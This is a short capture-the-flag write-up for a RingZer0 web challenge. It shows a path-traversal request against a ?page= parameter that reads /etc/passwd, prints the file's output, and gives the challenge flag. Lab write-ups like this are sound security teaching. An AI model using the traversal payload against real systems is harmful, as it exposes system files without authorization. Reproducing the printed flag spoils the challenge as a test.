RingZer0-18 - Looking for Password File
Web
Looking for password file
Password file
The hint tells us a to look for a password file.
The url is http://ringzer0team.com:1008/?page=lorem.php
The ?page=
is a giveaway for a page that could be vulnerable to path
traversal.
In the linux system the password file is located in /etc/passwd
So let’s try to get to the file
http://ringzer0team.com:1008/?page=../../../etc/passwd
Results
root❌0:0:root:/root:/bin/bash
daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin
sync❌4:65534:sync:/bin:/bin/sync
games❌5:60:games:/usr/games:/usr/sbin/nologin
man❌6:12:man:/var/cache/man:/usr/sbin/nologin
lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail❌8:8:mail:/var/mail:/usr/sbin/nologin
news❌9:9:news:/var/spool/news:/usr/sbin/nologin
uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy❌13:13:proxy:/bin:/usr/sbin/nologin
www-data❌33:33:www-data:/var/www:/usr/sbin/nologin
backup❌34:34:backup:/var/backups:/usr/sbin/nologin list❌38:38:Mailing List
Manager:/var/list:/usr/sbin/nologin
irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats❌41:41:Gnats
Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody❌65534:65534:FLAG-zH9g1934v774Y7Zx5s16t5ym8Z:/nonexistent:/usr/sbin/nologin
libuuid❌100:101::/var/lib/libuuid:
sshd❌101:65534::/var/run/sshd:/usr/sbin/nologin
syslog❌102:105::/home/syslog:/bin/false
And there’s the flag!
The flag is : FLAG-zH9g1934v774Y7Zx5s16t5ym8Z